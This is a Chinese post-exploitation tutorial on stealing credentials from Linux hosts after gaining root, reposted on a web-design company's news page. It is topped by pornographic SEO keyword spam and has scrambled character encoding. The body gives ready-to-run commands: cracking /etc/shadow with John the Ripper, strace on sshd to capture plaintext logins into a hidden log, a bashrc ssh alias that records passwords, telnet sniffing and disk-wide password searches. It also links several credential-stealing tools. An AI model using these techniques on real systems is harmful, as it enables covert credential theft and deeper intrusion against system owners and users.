小说阅读器,君子以泽,懒人听书

最近2018中文字幕在日韩欧美国产成人片_国产日韩精品一区二区在线_在线观看成年美女黄网色视频_国产精品一区三区五区_国产精彩刺激乱对白_看黄色黄大色黄片免费_人人超碰自拍cao_国产高清av在线_亚洲精品电影av_日韩美女尤物视频网站

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

Linux下密碼憑證竊取技巧和工具

當獲得一臺主機的root權限，我們總是會想辦法通過收集各種密碼憑證，以便繼續(xù)擴大戰(zhàn)果。Linux下的環(huán)境，相對比更純粹一些，介紹幾個比較常見的技巧和工具。

成都創(chuàng)新互聯(lián)專注于網(wǎng)站建設|成都網(wǎng)站改版|優(yōu)化|托管以及網(wǎng)絡推廣，積累了大量的網(wǎng)站設計與制作經(jīng)驗，為許多企業(yè)提供了網(wǎng)站定制設計服務，案例作品覆蓋成都濕噴機等行業(yè)。能根據(jù)企業(yè)所處的行業(yè)與銷售的產(chǎn)品，結合品牌形象的塑造，量身開發(fā)品質網(wǎng)站。

01、history記錄敏感操作

Linux系統(tǒng)會自動把用戶的操作命令記錄到歷史列表中，當用戶在命令行中輸入賬號、密碼進行登錄時，將會導致敏感信息泄露。

Linux下密碼憑證竊取技巧和工具介紹Linux下密碼憑證竊取技巧和工具介紹

02、shadow文件破解

shadow用于存儲 Linux 系統(tǒng)中用戶的密碼信息，以一個用例來說明：

root:$1$aXmGMjXX$MGrR.Hquwr7UVMwOGOzJV0::0:99999:7:::

密碼域密文由三部分組成，即：encrypted。當id=1，采用md5進行加密，弱口令容易被破解。

當id為5時，采用SHA256進行加密，id為6時，采用SHA512進行加密，可以通過john進行暴力破解。

wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
make clean linux-x86-64
./john /etc/shadow

03、mimipenguin抓取密碼

一款Linux下的密碼抓取神器，需要root權限運行，通過轉儲進程并提取很可能包含明文密碼的行來利用內存中的明文憑證，目前支持Kali、Ubnutu等操作系統(tǒng)。

Github地址：https://github.com/huntergregal/mimipenguin

04、使用Strace收集登錄憑證

strace是一個動態(tài)跟蹤工具，堪比鍵盤記錄器的存在，可用來收集登錄憑證。

(1)獲取sshd進程明文密碼

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

使用正在來匹配用戶和密碼

# 查找用戶名和密碼
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

# 結果形式如下
[pid  2401] 22:34:34 read(6, "\10\0\0\0\4root", 9) = 9
[pid  2401] 22:34:34 read(6, "\4\0\0\0\16ssh-connection\0\0\0\0\0\0\0\0", 27) = 27
[pid  2401] 22:34:34 read(6, "\f\0\0\0\4toor", 9) = 9

(2)收集ssh登陸憑證

# 添加命令別名
vi ~/.bashrc或者/etc/bashrc
alias ssh='strace -f -e trace=read,write -o /tmp/.ssh-`date '+%d%h%m%s'`.log -s 32 ssh'
# 使命令別名立即生效
source ~/.bashrc

通過grep 找到匹配行的后8行，可以根據(jù)密碼長度調整行數(shù)

grep -A 9 'password' .ssh-25Sep091601017212.log

05、tcpdump 抓包分析

抓取數(shù)據(jù)包進行分析，獲取明文賬號密碼，比如ftp、telnet、http。

tcpdump -i ens33 port 23 -w test.cap

06、全盤搜索敏感信息

全局搜索配置文件、腳本、數(shù)據(jù)庫、日志文件是否有包含密碼。

grep -rn "password=" /

07、swap_digger

一個用于自動進行Linux交換分析bash腳本，自動進行交換提取，并搜索Linux用戶憑據(jù)，Web表單憑據(jù)，Web表單電子郵件，HTTP基本身份驗證，WiFi SSID和密鑰等。

github項目地址：https://github.com/sevagas/swap_digger

08、Impost3r

一個利用C語言編寫,用來竊取linux下各類密碼(ssh,su,sudo)的工具。

github項目地址：https://github.com/ph4ntonn/Impost3r

分享題目：Linux下密碼憑證竊取技巧和工具
文章路徑：http://m.fisionsoft.com.cn/article/dpdeiio.html

新聞中心

01、history記錄敏感操作

02、shadow文件破解

03、mimipenguin抓取密碼

04、使用Strace收集登錄憑證

05、tcpdump 抓包分析